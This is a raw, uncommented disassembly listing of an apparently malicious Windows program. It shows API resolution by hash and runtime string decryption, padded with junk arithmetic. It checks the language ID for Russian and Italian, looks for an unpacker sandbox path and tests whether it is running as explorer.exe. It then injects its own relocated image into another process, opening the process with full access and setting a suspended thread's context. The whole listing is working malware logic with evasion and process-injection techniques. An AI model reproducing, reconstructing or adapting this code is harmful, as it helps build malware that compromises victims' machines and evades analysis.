loc_401C31: ; CODE XREF: sub_4017DA+404�j
; sub_4017DA+452�j
pop ebx
leave
retn
sub_4017DA endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_401C34 proc near ; CODE XREF: sub_4029BA:loc_402CDC�p
; DATA XREF: sub_402819+13C�o
var_3B8 = byte ptr -3B8h
var_2B8 = byte ptr -2B8h
var_1B8 = byte ptr -1B8h
var_1A8 = byte ptr -1A8h
var_198 = byte ptr -198h
var_188 = byte ptr -188h
var_178 = byte ptr -178h
var_168 = byte ptr -168h
var_158 = byte ptr -158h
var_148 = byte ptr -148h
var_48 = byte ptr -48h
var_38 = byte ptr -38h
var_30 = word ptr -30h
var_2E = word ptr -2Eh
var_28 = dword ptr -28h
var_24 = dword ptr -24h
var_20 = dword ptr -20h
var_1C = byte ptr -1Ch
var_1B = byte ptr -1Bh
var_1A = byte ptr -1Ah
var_19 = byte ptr -19h
var_18 = byte ptr -18h
var_14 = byte ptr -14h
var_13 = byte ptr -13h
var_12 = byte ptr -12h
var_11 = byte ptr -11h
var_10 = byte ptr -10h
var_C = dword ptr -0Ch
var_8 = word ptr -8
var_4 = word ptr -4
push ebp
mov ebp, esp
sub esp, 3B8h
push ebx
push esi
push edi
push 0Bh
mov esi, offset dword_404108
push esi
push offset dword_403034
call sub_40102C
mov edi, 0C8AC8026h
push edi
push 1
call sub_401117
add esp, 14h
push esi
call eax
push 0Ah
push esi
push offset dword_4031E8
call sub_40102C
push edi
push 1
call sub_401117
add esp, 14h
push esi
call eax
push 0Ch
push esi
push offset dword_4031D8
call sub_40102C
push edi
push 1
call sub_401117
add esp, 14h
push esi
call eax
mov eax, dword_404104
add eax, 0FFFFFFA5h
cmp eax, 90h
ja short loc_401CB0
inc dword_404104
loc_401CB0: ; CODE XREF: sub_401C34+74�j
push 7A813811h
xor ebx, ebx
push 1
mov [ebp+var_28], ebx
call sub_401117
pop ecx
pop ecx
call eax
cmp dword_404104, 0E1h
movzx eax, ax
mov [ebp+var_24], eax
jge short loc_401CDD
inc dword_404104
loc_401CDD: ; CODE XREF: sub_401C34+A1�j
push 3
push esi
push offset dword_4031D4
call sub_40102C
push 67ECDE97h
push 1
call sub_401117
add esp, 14h
push ebx
push ebx
push ebx
push ebx
lea ecx, [ebp+var_28]
push ecx
push ebx
push ebx
push esi
call eax
push 2
push esi
push offset dword_4031D0
call sub_40102C
push [ebp+var_28]
lea eax, [ebp+var_48]
push esi
push eax
call dword_403014 ; wsprintfA
add esp, 18h
cmp dword_404104, 89h
jge short loc_401D36
inc dword_404104
loc_401D36: ; CODE XREF: sub_401C34+FA�j
push 0Bh
push esi
push offset dword_4031C4
call sub_40102C
mov edi, dword_403000
add esp, 0Ch
push esi
lea eax, [ebp+var_1B8]
push eax
call edi ; lstrcpy
push 0Ch
push esi
push offset dword_4031B4
call sub_40102C
add esp, 0Ch
push esi
lea eax, [ebp+var_1A8]
push eax
call edi ; lstrcpy
push 0Ch
push esi
push offset dword_4031A4
call sub_40102C
add esp, 0Ch
push esi
lea eax, [ebp+var_198]
push eax
call edi ; lstrcpy
push 0Ah
push esi
push offset dword_403198
call sub_40102C
add esp, 0Ch
push esi
lea eax, [ebp+var_188]
push eax
call edi ; lstrcpy
push 0Bh
push esi
push offset dword_40318C
call sub_40102C
add esp, 0Ch
push esi
lea eax, [ebp+var_178]
push eax
call edi ; lstrcpy
push 9
push esi
push offset dword_403180
call sub_40102C
add esp, 0Ch
push esi
lea eax, [ebp+var_168]
push eax
call edi ; lstrcpy
push 9
push esi
push offset dword_403174
call sub_40102C
add esp, 0Ch
push esi
lea eax, [ebp+var_158]
push eax
call edi ; lstrcpy
cmp word ptr [ebp+var_24], 419h
jz loc_40242F
call sub_401094
test eax, eax
jnz loc_40242F
call sub_40130A
test al, al
jz short loc_401E1B
push ebx
call sub_4014A6
pop ecx
loc_401E1B: ; CODE XREF: sub_401C34+1DE�j
mov [ebp+var_20], ebx
mov ebx, dword_40300C
loc_401E24: ; CODE XREF: sub_401C34+57E�j
cmp [ebp+var_20], 0
jnz short loc_401E34
push 23h
push esi
push offset dword_403150
jmp short loc_401E3C
; ---------------------------------------------------------------------------
loc_401E34: ; CODE XREF: sub_401C34+1F4�j
push 22h
push esi
push offset dword_40312C
loc_401E3C: ; CODE XREF: sub_401C34+1FE�j
call sub_40102C
add esp, 0Ch
push esi
lea eax, [ebp+var_3B8]
push eax
call edi ; lstrcpy
push 3
push esi
push offset dword_403128
call sub_40102C
add esp, 0Ch
push esi
lea eax, [ebp+var_2B8]
push eax
call edi ; lstrcpy
lea eax, [ebp+var_48]
push eax
lea eax, [ebp+var_2B8]
push eax
call ebx ; lstrcat
lea eax, [ebp+var_3B8]
push eax
lea eax, [ebp+var_148]
push eax
call edi ; lstrcpy
push 16h
push esi
push offset dword_403110
call sub_40102C
add esp, 0Ch
push esi
lea eax, [ebp+var_148]
push eax
call ebx ; lstrcat
push 0
lea eax, [ebp+var_2B8]
push eax
lea eax, [ebp+var_148]
push eax
call sub_4017DA
add esp, 0Ch
push 2
push esi
push offset dword_40310C
call sub_40102C
add esp, 0Ch
lea eax, [ebp+var_2B8]
push esi
push eax
call edi ; lstrcpy
cmp word ptr [ebp+var_24], 410h
jnz short loc_401F33
lea eax, [ebp+var_1A8]
push eax
lea eax, [ebp+var_2B8]
push eax
call ebx ; lstrcat
lea eax, [ebp+var_3B8]
push eax
lea eax, [ebp+var_148]
push eax
call edi ; lstrcpy
push 7
push esi
push offset dword_403104
call sub_40102C
add esp, 0Ch
push esi
lea eax, [ebp+var_148]
push eax
call ebx ; lstrcat
push 1
lea eax, [ebp+var_2B8]
push eax
lea eax, [ebp+var_148]
push eax
call sub_4017DA
add esp, 0Ch
mov [ebp+var_C], eax
jmp loc_402138
; ---------------------------------------------------------------------------
loc_401F33: ; CODE XREF: sub_401C34+2A3�j
lea eax, [ebp+var_1B8]
push eax
lea eax, [ebp+var_2B8]
push eax
call ebx ; lstrcat
lea eax, [ebp+var_3B8]
push eax
lea eax, [ebp+var_148]
push eax
call edi ; lstrcpy
push 0Bh
push esi
push offset dword_4030F8
call sub_40102C
add esp, 0Ch
push esi
lea eax, [ebp+var_148]
push eax
call ebx ; lstrcat
push 1
lea eax, [ebp+var_2B8]
push eax
lea eax, [ebp+var_148]
push eax
call sub_4017DA
push 2
push esi
push offset dword_40310C
mov [ebp+var_C], eax
call sub_40102C
add esp, 18h
push esi
lea eax, [ebp+var_2B8]
push eax
call edi ; lstrcpy
lea eax, [ebp+var_178]
push eax
lea eax, [ebp+var_2B8]
push eax
call ebx ; lstrcat
lea eax, [ebp+var_3B8]
push eax
lea eax, [ebp+var_148]
push eax
call edi ; lstrcpy
push 9
push esi
push offset dword_4030EC
call sub_40102C
add esp, 0Ch
push esi
lea eax, [ebp+var_148]
push eax
call ebx ; lstrcat
push 1
lea eax, [ebp+var_2B8]
push eax
lea eax, [ebp+var_148]
push eax
call sub_4017DA
add [ebp+var_C], eax
push 2
push esi
push offset dword_40310C
call sub_40102C
add esp, 18h
push esi
lea eax, [ebp+var_2B8]
push eax
call edi ; lstrcpy
lea eax, [ebp+var_168]
push eax
lea eax, [ebp+var_2B8]
push eax
call ebx ; lstrcat
lea eax, [ebp+var_3B8]
push eax
lea eax, [ebp+var_148]
push eax
call edi ; lstrcpy
push 0Eh
push esi
push offset dword_4030DC
call sub_40102C
add esp, 0Ch
push esi
lea eax, [ebp+var_148]
push eax
call ebx ; lstrcat
push 1
lea eax, [ebp+var_2B8]
push eax
lea eax, [ebp+var_148]
push eax
call sub_4017DA
add [ebp+var_C], eax
push 2
push esi
push offset dword_40310C
call sub_40102C
add esp, 18h
push esi
lea eax, [ebp+var_2B8]
push eax
call edi ; lstrcpy
lea eax, [ebp+var_198]
push eax
lea eax, [ebp+var_2B8]
push eax
call ebx ; lstrcat
lea eax, [ebp+var_3B8]
push eax
lea eax, [ebp+var_148]
push eax
call edi ; lstrcpy
push 0Eh
push esi
push offset dword_4030CC
call sub_40102C
add esp, 0Ch
push esi
lea eax, [ebp+var_148]
push eax
call ebx ; lstrcat
push 1
lea eax, [ebp+var_2B8]
push eax
lea eax, [ebp+var_148]
push eax
call sub_4017DA
add [ebp+var_C], eax
push 2
push esi
push offset dword_40310C
call sub_40102C
add esp, 18h
push esi
lea eax, [ebp+var_2B8]
push eax
call edi ; lstrcpy
lea eax, [ebp+var_188]
push eax
lea eax, [ebp+var_2B8]
push eax
call ebx ; lstrcat
lea eax, [ebp+var_3B8]
push eax
lea eax, [ebp+var_148]
push eax
call edi ; lstrcpy
push 0Bh
push esi
push offset dword_4030C0
call sub_40102C
add esp, 0Ch
push esi
lea eax, [ebp+var_148]
push eax
call ebx ; lstrcat
push 1
lea eax, [ebp+var_2B8]
push eax
lea eax, [ebp+var_148]
push eax
call sub_4017DA
add esp, 0Ch
add [ebp+var_C], eax
loc_402138: ; CODE XREF: sub_401C34+2FA�j
push 2
push esi
push offset dword_40310C
call sub_40102C
add esp, 0Ch
push esi
lea eax, [ebp+var_2B8]
push eax
call edi ; lstrcpy
lea eax, [ebp+var_158]
push eax
lea eax, [ebp+var_2B8]
push eax
call ebx ; lstrcat
lea eax, [ebp+var_3B8]
push eax
lea eax, [ebp+var_148]
push eax
call edi ; lstrcpy
push 0Ah
push esi
push offset dword_4030B4
call sub_40102C
add esp, 0Ch
push esi
lea eax, [ebp+var_148]
push eax
call ebx ; lstrcat
push 1
lea eax, [ebp+var_2B8]
push eax
lea eax, [ebp+var_148]
push eax
call sub_4017DA
add eax, [ebp+var_C]
add esp, 0Ch
test eax, eax
jg short loc_4021BD
inc [ebp+var_20]
cmp [ebp+var_20], 2
jl loc_401E24
jmp loc_40242D
; ---------------------------------------------------------------------------
loc_4021BD: ; CODE XREF: sub_401C34+575�j
push 3
push esi
push offset dword_403128
call sub_40102C
add esp, 0Ch
push esi
lea eax, [ebp+var_2B8]
push eax
call edi ; lstrcpy
lea eax, [ebp+var_48]
push eax
lea eax, [ebp+var_2B8]
push eax
call ebx ; lstrcat
lea eax, [ebp+var_3B8]
push eax
lea eax, [ebp+var_148]
push eax
call edi ; lstrcpy
cmp dword_404104, 9
jl short loc_402203
inc dword_404104
loc_402203: ; CODE XREF: sub_401C34+5C7�j
cmp dword_404104, 0C9h
jle short loc_402219
mov dword_404104, 1Eh
loc_402219: ; CODE XREF: sub_401C34+5D9�j
push 1Fh
push esi
push offset dword_403094
call sub_40102C
add esp, 0Ch
push esi
lea eax, [ebp+var_148]
push eax
call ebx ; lstrcat
push 270118E2h
push 1
call sub_401117
pop ecx
pop ecx
lea ecx, [ebp+var_38]
push ecx
call eax
mov eax, dword_404104
add eax, 0FFFFFFD5h
cmp eax, 0BFh
ja short loc_40225C
inc dword_404104
loc_40225C: ; CODE XREF: sub_401C34+620�j
push 2
push esi
mov edi, offset dword_403090
push edi
call sub_40102C
movzx eax, [ebp+var_30]
push eax
lea eax, [ebp+var_8]
push esi
push eax
call dword_403014 ; wsprintfA
mov al, byte ptr [ebp+var_8]
add al, 1Dh
add esp, 18h
cmp byte ptr [ebp+var_8+1], 0
mov [ebp+var_13], al
jnz short loc_402291
mov [ebp+var_11], 30h
jmp short loc_402299
; ---------------------------------------------------------------------------
loc_402291: ; CODE XREF: sub_401C34+655�j
mov al, byte ptr [ebp+var_8+1]
add al, 13h
mov [ebp+var_11], al
loc_402299: ; CODE XREF: sub_401C34+65B�j
cmp dword_404104, 4
jl short loc_4022A8
inc dword_404104
loc_4022A8: ; CODE XREF: sub_401C34+66C�j
cmp dword_404104, 0B9h
jle short loc_4022BE
mov dword_404104, 1Ch
loc_4022BE: ; CODE XREF: sub_401C34+67E�j
push 2
push esi
push edi
call sub_40102C
movzx eax, [ebp+var_2E]
push eax
lea eax, [ebp+var_4]
push esi
push eax
call dword_403014 ; wsprintfA
mov al, byte ptr [ebp+var_4]
add al, 17h
add esp, 18h
cmp byte ptr [ebp+var_4+1], 0
mov [ebp+var_14], al
jnz short loc_4022EE
mov [ebp+var_12], 30h
jmp short loc_4022F6
; ---------------------------------------------------------------------------
loc_4022EE: ; CODE XREF: sub_401C34+6B2�j
mov al, byte ptr [ebp+var_4+1]
add al, 19h
mov [ebp+var_12], al
loc_4022F6: ; CODE XREF: sub_401C34+6B8�j
lea eax, [ebp+var_14]
push eax
lea eax, [ebp+var_148]
push eax
mov [ebp+var_10], 0
call ebx ; lstrcat
push 7
push esi
push offset dword_403088
call sub_40102C
add esp, 0Ch
push esi
lea eax, [ebp+var_148]
push eax
call ebx ; lstrcat
push 270118E2h
push 1
call sub_401117
pop ecx
pop ecx
lea ecx, [ebp+var_38]
push ecx
call eax
mov eax, dword_404104
add eax, 0FFFFFFD5h
cmp eax, 0C1h
ja short loc_40234A
inc dword_404104
loc_40234A: ; CODE XREF: sub_401C34+70E�j
push 2
push esi
push edi
call sub_40102C
movzx eax, [ebp+var_30]
push eax
lea eax, [ebp+var_8]
push esi
push eax
call dword_403014 ; wsprintfA
mov ax, [ebp+var_8]
add esp, 18h
test ah, ah
mov [ebp+var_1B], al
mov [ebp+var_1A], 30h
jz short loc_402378
mov [ebp+var_1A], ah
loc_402378: ; CODE XREF: sub_401C34+73F�j
push 25h
xor ecx, ecx
pop eax
inc ecx
loc_40237E: ; CODE XREF: sub_401C34+75F�j
cmp ecx, 0CEh
ja short loc_402388
inc eax
inc ecx
loc_402388: ; CODE XREF: sub_401C34+750�j
add eax, 0Ah
add ecx, 0Ah
cmp eax, 97h
jl short loc_40237E
push 2
push esi
push edi
mov dword_404104, eax
call sub_40102C
movzx eax, [ebp+var_2E]
push eax
lea eax, [ebp+var_4]
push esi
push eax
call dword_403014 ; wsprintfA
mov ax, [ebp+var_4]
add esp, 18h
test ah, ah
mov [ebp+var_19], al
mov [ebp+var_1C], 30h
jz short loc_4023C8
mov [ebp+var_1C], ah
loc_4023C8: ; CODE XREF: sub_401C34+78F�j
lea eax, [ebp+var_1C]
push eax
lea eax, [ebp+var_148]
push eax
mov [ebp+var_18], 0
call ebx ; lstrcat
push 4
push esi
push offset dword_403080
call sub_40102C
add esp, 0Ch
push esi
lea eax, [ebp+var_148]
push eax
call ebx ; lstrcat
lea eax, [ebp+var_48]
push eax
lea eax, [ebp+var_148]
push eax
call ebx ; lstrcat
push 0
lea eax, [ebp+var_2B8]
push eax
lea eax, [ebp+var_148]
push eax
call sub_4017DA
mov eax, dword_404104
add eax, 0FFFFFFA2h
add esp, 0Ch
cmp eax, 8Dh
ja short loc_40242D
inc dword_404104
loc_40242D: ; CODE XREF: sub_401C34+584�j
; sub_401C34+7F1�j
xor ebx, ebx
loc_40242F: ; CODE XREF: sub_401C34+1C4�j
; sub_401C34+1D1�j
push 95902B19h
push 1
call sub_401117
pop ecx
pop ecx
push ebx
call eax
pop edi
pop esi
pop ebx
leave
retn
sub_401C34 endp
; =============== S U B R O U T I N E =======================================
sub_402445 proc near ; DATA XREF: sub_402819+5D�o
push esi
push edi
mov edi, 81F0F0DFh
push edi
push 1
call sub_401117
mov esi, offset aCM_unpackerPac ; "C:\\m_unpacker\\packed.exe"
jmp short loc_40248D
; ---------------------------------------------------------------------------
loc_40245B: ; CODE XREF: sub_402445+4F�j
push 1297812Ch
push 1
call sub_401117
pop ecx
pop ecx
call eax
cmp eax, 2
jz short loc_402496
push 3D9972F5h
push 1
call sub_401117
pop ecx
pop ecx
push 3E8h
call eax
push edi
push 1
call sub_401117
loc_40248D: ; CODE XREF: sub_402445+14�j
pop ecx
pop ecx
push esi
call eax
test eax, eax
jz short loc_40245B
loc_402496: ; CODE XREF: sub_402445+29�j
pop edi
xor eax, eax
pop esi
retn 4
sub_402445 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_40249D proc near ; CODE XREF: sub_402819+141�p
; sub_4029BA+129�p ...
var_310 = dword ptr -310h
var_260 = dword ptr -260h
var_44 = byte ptr -44h
var_24 = dword ptr -24h
var_20 = dword ptr -20h
var_1C = dword ptr -1Ch
var_18 = dword ptr -18h
var_14 = dword ptr -14h
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_1 = byte ptr -1
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
push ebp
mov ebp, esp
sub esp, 310h
push ebx
push esi
push edi
call sub_401113
and eax, 0FFFF0000h
mov ecx, [eax+3Ch]
add ecx, eax
cmp dword_404104, 0DDh
mov [ebp+var_8], eax
lea eax, [ecx+18h]
mov esi, [eax+38h]
mov [ebp+var_24], ecx
mov [ebp+var_18], eax
mov [ebp+var_1C], esi
jge short loc_4024DC
inc dword_404104
loc_4024DC: ; CODE XREF: sub_40249D+37�j
push 0A08B638Ch
xor ebx, ebx
push 1
mov [ebp+var_1], bl
call sub_401117
pop ecx
pop ecx
push 9
call eax
mov edi, eax
neg edi
sbb edi, edi
and edi, 3Ch
add edi, 4
cmp dword_404104, 10h
jl short loc_40250E
inc dword_404104
loc_40250E: ; CODE XREF: sub_40249D+69�j
cmp dword_404104, 0AFh
jle short loc_402524
mov dword_404104, 16h
loc_402524: ; CODE XREF: sub_40249D+7B�j
push 0EF0A25B7h
push 1
call sub_401117
pop ecx
pop ecx
push ebx
push esi
push ebx
push edi
push ebx
push 0FFFFFFFFh
call eax
cmp eax, ebx
mov [ebp+var_10], eax
jnz short loc_402549
xor al, al
jmp loc_402814
; ---------------------------------------------------------------------------
loc_402549: ; CODE XREF: sub_40249D+A3�j
push 5CD9430h
push 1
call sub_401117
pop ecx
pop ecx
push ebx
push ebx
push ebx
push 2
push [ebp+var_10]
call eax
cmp eax, ebx
mov [ebp+var_14], eax
jz loc_4027E9
cmp dword_404104, 3Ah
jge short loc_40257B
inc dword_404104
loc_40257B: ; CODE XREF: sub_40249D+D6�j
push 12h
mov esi, offset dword_404108
push esi
push offset dword_403214
call sub_40102C
add esp, 0Ch
push esi
lea eax, [ebp+var_44]
push eax
call dword_403000 ; lstrcpy
push 9
push esi
push offset dword_403208
call sub_40102C
push 0C8AC8026h
push 1
call sub_401117
add esp, 14h
push esi
call eax
push 1FC0EAEEh
push 1
mov esi, eax
call sub_401117
pop ecx
pop ecx
lea ecx, [ebp+var_44]
push ecx
push esi
call eax
push 19h
pop ecx
push 0FFFFFFE9h
mov [ebp+var_C], ebx
pop edx
loc_4025DA: ; CODE XREF: sub_40249D+150�j
cmp edx, 0B9h
ja short loc_4025E4
inc ecx
inc edx
loc_4025E4: ; CODE XREF: sub_40249D+143�j
add ecx, 27h
add edx, 27h
cmp ecx, 6Fh
jl short loc_4025DA
mov esi, [ebp+var_1C]
push edi
push ebx
push 1
mov dword_404104, ecx
lea ecx, [ebp+var_20]
push ecx
push ebx
push ebx
push ebx
lea ecx, [ebp+var_C]
push ecx
push [ebp+arg_4]
mov [ebp+var_20], esi
push [ebp+var_10]
call eax
push esi
push [ebp+var_8]
push [ebp+var_14]
call sub_4010EE
mov edi, dword_404104
add esp, 0Ch
cmp edi, 0Dh
jl short loc_402633
inc edi
mov dword_404104, edi
loc_402633: ; CODE XREF: sub_40249D+18D�j
cmp edi, 0C1h
jle short loc_402644
push 18h
pop edi
mov dword_404104, edi
loc_402644: ; CODE XREF: sub_40249D+19C�j
mov eax, [ebp+var_24]
movzx ecx, word ptr [eax+14h]
add ecx, [ebp+var_18]
cmp edi, 0Bh
jl short loc_40265A
inc edi
mov dword_404104, edi
loc_40265A: ; CODE XREF: sub_40249D+1B4�j
cmp edi, 0B6h
jle short loc_40266B
push 1Ah
pop edi
mov dword_404104, edi
loc_40266B: ; CODE XREF: sub_40249D+1C3�j
mov esi, [ebp+var_C]
mov eax, esi
sub eax, [ebp+var_8]
mov [ebp+var_18], eax
lea eax, [edi-1Dh]
cmp eax, 0D5h
ja short loc_402687
inc edi
mov dword_404104, edi
loc_402687: ; CODE XREF: sub_40249D+1E1�j
mov eax, [ecx+34h]
add eax, [ebp+var_8]
loc_40268D: ; CODE XREF: sub_40249D+201�j
cmp word ptr [eax], 0BE8Dh
jnz short loc_40269D
cmp dword ptr [eax+6], 0C009078Bh
jz short loc_4026A0
loc_40269D: ; CODE XREF: sub_40249D+1F5�j
inc eax
jmp short loc_40268D
; ---------------------------------------------------------------------------
loc_4026A0: ; CODE XREF: sub_40249D+1FE�j
mov eax, [eax+2]
add eax, [ecx+0Ch]
add eax, [ebp+var_8]
jmp short loc_4026B8
; ---------------------------------------------------------------------------
loc_4026AB: ; CODE XREF: sub_40249D+21D�j
add eax, 8
jmp short loc_4026B1
; ---------------------------------------------------------------------------
loc_4026B0: ; CODE XREF: sub_40249D+217�j
inc eax
loc_4026B1: ; CODE XREF: sub_40249D+211�j
cmp [eax], bx
jnz short loc_4026B0
inc eax
inc eax
loc_4026B8: ; CODE XREF: sub_40249D+20C�j
cmp [eax], ebx
jnz short loc_4026AB
cmp edi, 0ABh
jge short loc_4026CB
inc edi
mov dword_404104, edi
loc_4026CB: ; CODE XREF: sub_40249D+225�j
mov ecx, [ecx+0Ch]
mov edx, [ebp+var_14]
add eax, 4
lea edx, [ecx+edx-4]
mov cl, [eax]
inc eax
cmp cl, bl
jz short loc_40270F
loc_4026DF: ; CODE XREF: sub_40249D+267�j
cmp cl, 0F0h
jnb short loc_4026EB
movzx ecx, cl
add edx, ecx
jmp short loc_4026FA
; ---------------------------------------------------------------------------
loc_4026EB: ; CODE XREF: sub_40249D+245�j
movzx esi, word ptr [eax]
and ecx, 0Fh
shl ecx, 10h
or ecx, esi
add edx, ecx
inc eax
inc eax
loc_4026FA: ; CODE XREF: sub_40249D+24C�j
mov ecx, [ebp+var_18]
add [edx], ecx
mov cl, [eax]
inc eax
cmp cl, bl
jnz short loc_4026DF
mov esi, [ebp+var_C]
mov edi, dword_404104
loc_40270F: ; CODE XREF: sub_40249D+240�j
cmp edi, 19h
jge short loc_40271B
inc edi
mov dword_404104, edi
loc_40271B: ; CODE XREF: sub_40249D+275�j
sub esi, [ebp+var_8]
add esi, [ebp+arg_0]
cmp [ebp+arg_8], ebx
mov edi, esi
jnz short loc_402769
push 0E61874B3h
push 1
call sub_401117
pop ecx
pop ecx
push ebx
push ebx
push ebx
push edi
push ebx
push ebx
push [ebp+arg_4]
call eax
push 723EB0D5h
push 1
mov esi, eax
call sub_401117
pop ecx
pop ecx
push esi
call eax
cmp dword_404104, 6Ch
mov [ebp+var_1], 1
jge short loc_4027D6
inc dword_404104
jmp short loc_4027D6
; ---------------------------------------------------------------------------
loc_402769: ; CODE XREF: sub_40249D+289�j
push 0AA1DE02Fh
push 1
mov [ebp+var_310], 10002h
call sub_401117
pop ecx
pop ecx
lea ecx, [ebp+var_310]
push ecx
push [ebp+arg_8]
call eax
push 0AA1DC82Fh
push 1
mov [ebp+var_260], edi
call sub_401117
pop ecx
pop ecx
lea ecx, [ebp+var_310]
push ecx
push [ebp+arg_8]
call eax
cmp dword_404104, 0Ch
mov [ebp+var_1], 1
jl short loc_4027C0
inc dword_404104
loc_4027C0: ; CODE XREF: sub_40249D+31B�j
cmp dword_404104, 0D0h
jle short loc_4027D6
mov dword_404104, 14h
loc_4027D6: ; CODE XREF: sub_40249D+2C2�j
; sub_40249D+2CA�j ...
push 77CD9567h
push 1
call sub_401117
pop ecx
pop ecx
push [ebp+var_14]
call eax
loc_4027E9: ; CODE XREF: sub_40249D+C9�j
push 723EB0D5h
push 1
call sub_401117
pop ecx
pop ecx
push [ebp+var_10]
call eax
mov eax, dword_404104
add eax, 0FFFFFFCFh
cmp eax, 0A5h
ja short loc_402811
inc dword_404104
loc_402811: ; CODE XREF: sub_40249D+36C�j
mov al, [ebp+var_1]
loc_402814: ; CODE XREF: sub_40249D+A7�j
pop edi
pop esi
pop ebx
leave
retn
sub_40249D endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_402819 proc near ; DATA XREF: sub_4029BA+124�o
; sub_4029BA+2F1�o
var_14C = byte ptr -14Ch
var_48 = dword ptr -48h
var_44 = byte ptr -44h
var_1C = dword ptr -1Ch
var_18 = word ptr -18h
var_4 = dword ptr -4
push ebp
mov ebp, esp
sub esp, 14Ch
push ebx
push edi
xor ebx, ebx
push 3D9972F5h
inc ebx
push ebx
call sub_401117
pop ecx
pop ecx
push 7D0h
call eax
push 3Ch
pop eax
push 0FFFFFFF6h
pop ecx
loc_402841: ; CODE XREF: sub_402819+3D�j
cmp ecx, 84h
ja short loc_40284B
inc eax
inc ecx
loc_40284B: ; CODE XREF: sub_402819+2E�j
add eax, 1Bh
add ecx, 1Bh
cmp eax, 8Eh
jl short loc_402841
push esi
push 6FB89AF0h
xor edi, edi
push ebx
mov dword_404104, eax
mov [ebp+var_4], edi
call sub_401117
pop ecx
pop ecx
lea ecx, [ebp+var_4]
push ecx
push edi
push edi
push offset sub_402445
push edi
push edi
call eax
push 723EB0D5h
push ebx
mov esi, eax
call sub_401117
pop ecx
pop ecx
push esi
call eax
push 49A1374Ah
push ebx
call sub_401117
pop ecx
pop ecx
push 104h
lea ecx, [ebp+var_14C]
push ecx
call eax
push 0Ch
mov esi, offset dword_404108
push esi
push offset dword_403228
call sub_40102C
add esp, 0Ch
push esi
lea eax, [ebp+var_14C]
push eax
call dword_40300C ; lstrcat
mov esi, dword_404104
cmp esi, 4
jl short loc_4028E1
inc esi
mov dword_404104, esi
loc_4028E1: ; CODE XREF: sub_402819+BF�j
cmp esi, 0F6h
jle short loc_4028F2
push 25h
pop esi
mov dword_404104, esi
loc_4028F2: ; CODE XREF: sub_402819+CE�j
push 40h
lea eax, [ebp+var_44]
push edi
push eax
mov [ebp+var_48], 44h
call sub_4010BB
lea eax, [esi-49h]
add esp, 0Ch
cmp eax, 82h
mov [ebp+var_1C], ebx
mov [ebp+var_18], 5
ja short loc_402922
inc esi
mov dword_404104, esi
loc_402922: ; CODE XREF: sub_402819+100�j
push 46318AC7h
push ebx
call sub_401117
pop ecx
pop ecx
push offset dword_40420C
lea ecx, [ebp+var_48]
push ecx
push edi
push edi
push 4
push edi
push edi
push edi
lea ecx, [ebp+var_14C]
push ecx
push edi
call eax
push dword_404210
push dword_40420C
push offset sub_401C34
call sub_40249D
add esp, 0Ch
test al, al
jz short loc_40297C
mov esi, dword_404210
push 7B88BF3Bh
push ebx
call sub_401117
pop ecx
pop ecx
push esi
call eax
loc_40297C: ; CODE XREF: sub_402819+14B�j
cmp dword_404104, 4
pop esi
jl short loc_40298C
inc dword_404104
loc_40298C: ; CODE XREF: sub_402819+16B�j
cmp dword_404104, 0B6h
jle short loc_4029A2
mov dword_404104, 1Ch
loc_4029A2: ; CODE XREF: sub_402819+17D�j
push 768AA260h
push ebx
call sub_401117
pop ecx
pop ecx
push edi
call eax
pop edi
xor eax, eax
pop ebx
leave
retn 4
sub_402819 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4029BA proc near ; CODE XREF: start+1BC�j
var_13C = byte ptr -13Ch
var_13B = byte ptr -13Bh
var_38 = byte ptr -38h
var_18 = dword ptr -18h
var_14 = dword ptr -14h
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
sub esp, 13Ch
push ebx
push esi
push edi
lea ebx, [ebp+var_13C]
call sub_40130A
test al, al
jz loc_402CDC
push 24h
pop eax
push 0FFFFFFE3h
pop ecx
loc_4029DF: ; CODE XREF: sub_4029BA+38�j
cmp ecx, 0A9h
ja short loc_4029E9
inc eax
inc ecx
loc_4029E9: ; CODE XREF: sub_4029BA+2B�j
add eax, 0Ah
add ecx, 0Ah
cmp eax, 79h
jl short loc_4029DF
mov edi, 774393E8h
push edi
push 1
mov dword_404104, eax
call sub_401117
pop ecx
pop ecx
mov esi, 104h
push esi
lea ecx, [ebp+var_13C]
push ecx
push 0
call eax
xor ecx, ecx
test eax, eax
jz short loc_402A33
loc_402A1F: ; CODE XREF: sub_4029BA+77�j
lea edx, [ebp+ecx+var_13B]
cmp byte ptr [edx-1], 5Ch
jnz short loc_402A2E
mov ebx, edx
loc_402A2E: ; CODE XREF: sub_4029BA+70�j
inc ecx
cmp ecx, eax
jnz short loc_402A1F
loc_402A33: ; CODE XREF: sub_4029BA+63�j
mov ecx, [ebx]
mov eax, 20202020h
or ecx, eax
cmp ecx, 6C707865h
jnz loc_402B18
mov ecx, [ebx+4]
or ecx, eax
cmp ecx, 7265726Fh
jnz loc_402B18
mov ecx, [ebx+8]
or ecx, eax
cmp ecx, 6578652Eh
jnz loc_402B18
mov eax, [ebp+arg_4]
dec eax
jnz loc_402B11
push 8
pop ecx
push 0Ch
mov esi, offset dword_404108
xor eax, eax
push esi
lea edi, [ebp+var_38]
push offset dword_403238
rep stosd
call sub_40102C
add esp, 0Ch
push esi
lea eax, [ebp+var_38]
push eax
call dword_403000 ; lstrcpy
lea eax, [ebp+var_38]
push eax
call sub_4014A6
mov esi, eax
test esi, esi
pop ecx
jz short loc_402B11
cmp dword_404104, 47h
jge short loc_402ABD
inc dword_404104
loc_402ABD: ; CODE XREF: sub_4029BA+FB�j
push 99A4299Dh
push 1
call sub_401117
pop ecx
pop ecx
push esi
push 0
push 1F0FFFh
call eax
mov esi, eax
test esi, esi
jz short loc_402B11
push 0
push esi
push offset sub_402819
call sub_40249D
mov eax, dword_404104
add eax, 0FFFFFFCBh
add esp, 0Ch
cmp eax, 9Eh
ja short loc_402B00
inc dword_404104
loc_402B00: ; CODE XREF: sub_4029BA+13E�j
push 723EB0D5h
push 1
call sub_401117
pop ecx
pop ecx
push esi
call eax
loc_402B11: ; CODE XREF: sub_4029BA+B4�j
; sub_4029BA+F2�j ...
xor eax, eax
jmp loc_402D13
; ---------------------------------------------------------------------------
